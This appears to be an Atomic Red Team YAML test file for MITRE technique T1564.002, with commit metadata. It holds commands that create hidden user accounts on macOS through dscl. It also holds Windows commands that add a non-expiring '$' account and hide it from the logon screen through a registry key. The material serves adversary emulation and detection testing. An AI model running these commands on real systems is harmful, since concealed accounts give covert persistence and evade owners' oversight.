Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
65 lines
2.4 KiB
YAML
65 lines
2.4 KiB
YAML
attack_technique: T1564.002
|
|
display_name: 'Hide Artifacts: Hidden Users'
|
|
atomic_tests:
|
|
- name: Create Hidden User using UniqueID < 500
|
|
auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507
|
|
description: |
|
|
Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
|
|
supported_platforms:
|
|
- macos
|
|
input_arguments:
|
|
user_name:
|
|
description: username to add
|
|
type: string
|
|
default: APT
|
|
executor:
|
|
command: |
|
|
sudo dscl . -create /Users/#{user_name} UniqueID 333
|
|
cleanup_command: |
|
|
sudo dscl . -delete /Users/#{user_name}
|
|
elevation_required: true
|
|
name: sh
|
|
- name: Create Hidden User using IsHidden option
|
|
auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
|
|
description: |
|
|
Add a hidden user on macOS using IsHidden optoin
|
|
supported_platforms:
|
|
- macos
|
|
input_arguments:
|
|
user_name:
|
|
description: username to add
|
|
type: string
|
|
default: APT
|
|
executor:
|
|
command: |
|
|
sudo dscl . -create /Users/#{user_name} IsHidden 1
|
|
cleanup_command: |
|
|
sudo dscl . -delete /Users/#{user_name}
|
|
elevation_required: true
|
|
name: sh
|
|
- name: Create Hidden User in Registry
|
|
auto_generated_guid: 173126b7-afe4-45eb-8680-fa9f6400431c
|
|
description: |
|
|
Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.
|
|
Reference https://attack.mitre.org/techniques/T1564/002/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
user_password:
|
|
description: Password for new user account
|
|
type: string
|
|
default: At0micRedTeam!
|
|
user_name:
|
|
description: Username
|
|
type: string
|
|
default: AtomicOperator
|
|
executor:
|
|
command: |
|
|
NET USER #{user_name}$ #{user_password} /ADD /expires:never
|
|
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v #{user_name}$ /t REG_DWORD /d 0
|
|
cleanup_command: |
|
|
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v #{user_name}$ /f >nul 2>&1
|
|
net user ${user_name}$ /delete >nul 2>&1
|
|
name: command_prompt
|
|
elevation_required: true
|